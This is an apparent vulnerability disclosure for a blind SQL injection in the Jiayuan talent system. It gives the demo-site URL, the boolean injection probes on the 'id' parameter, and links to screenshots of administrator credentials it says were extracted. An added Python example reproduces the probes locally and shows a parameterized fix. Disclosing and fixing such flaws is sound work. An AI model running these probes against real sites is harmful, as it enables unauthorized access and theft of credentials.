### Brief description:

One SQL injection in the Jiayuan talent system (嘉缘人才系统). Tested on the official website demo.

### Details:

The touch-screen version demo of the Jiayuan talent system:

```
http://m.rccms.com/person/resume.php?id=696
```

The `id` parameter is open to blind injection.

```
http://m.rccms.com/person/resume.php?id=696%20and
```

This reports an SQL error.

![2.png](https://images.seebug.org/upload/201411/19210240e8f7ce481e873ad068ecd04c5cc6082b.png)

```
http://m.rccms.com/person/resume.php?id=696%20and%201=1
```

This displays normally.

![3.png](https://images.seebug.org/upload/201411/192102515a77ace993c59cd1820b40036b88622d.png)

```
http://m.rccms.com/person/resume.php?id=696%20and%201=0
```

This shows a parameter error.

![4.png](https://images.seebug.org/upload/201411/192103013b5f7dd47270178fceed0c50f5c8de81.png)

Below is the administrator account and password information obtained with a test program:

![5.png](https://images.seebug.org/upload/201411/19210430579418af07ce582cbaa074b79c98d1a6.png)

![6.png](https://images.seebug.org/upload/201411/19210439ae51098fc818a8b039fc30a51c9fcc32.png)

![7.png](https://images.seebug.org/upload/201411/1921044797ef2d7df57fa82ab2aec7f7aac39204.png)

### Proof of vulnerability:

![2.png](https://images.seebug.org/upload/201411/19210240e8f7ce481e873ad068ecd04c5cc6082b.png)

![5.png](https://images.seebug.org/upload/201411/19210430579418af07ce582cbaa074b79c98d1a6.png)

![6.png](https://images.seebug.org/upload/201411/19210439ae51098fc818a8b039fc30a51c9fcc32.png)

![7.png](https://images.seebug.org/upload/201411/1921044797ef2d7df57fa82ab2aec7f7aac39204.png)
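The three responses listed in the details (SQL error, normal page, parameter error) are what a query built by string concatenation produces. The added example below, which is not code from the report or from the vendor, reproduces them against a local in-memory database and shows the corrected lookup beside it. The table, column and function names are hypothetical, and SQLite stands in for the application's database, which the page does not show.

```python
import re
import sqlite3

# The three id values from the report, URL-decoded.
PROBES = ["696 and", "696 and 1=1", "696 and 1=0"]


def make_db():
    """Constructed sample data; the schema is an assumption, not the vendor's."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE resume (id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO resume VALUES (696, 'sample resume')")
    return db


def lookup_vulnerable(db, raw_id):
    """Assumed 'before' pattern: the raw parameter is concatenated into the SQL."""
    try:
        row = db.execute("SELECT name FROM resume WHERE id=" + raw_id).fetchone()
    except sqlite3.Error:
        return "sql error"  # a dangling "and" leaves the statement malformed
    return "normal" if row else "parameter error"


def lookup_hardened(db, raw_id):
    """Accept only a short run of ASCII digits, then bind it as a parameter."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return "parameter error"
    row = db.execute(
        "SELECT name FROM resume WHERE id=?", (int(raw_id),)
    ).fetchone()
    return "normal" if row else "parameter error"


def responses(handler):
    """Run the report's three probes through a handler and collect the replies."""
    db = make_db()
    return [handler(db, probe) for probe in PROBES]


if __name__ == "__main__":
    for name, handler in (("vulnerable", lookup_vulnerable),
                          ("hardened", lookup_hardened)):
        print(name, responses(handler))
```

With the hardened lookup all three probes get the same reply, so the response no longer depends on whether the appended condition is true.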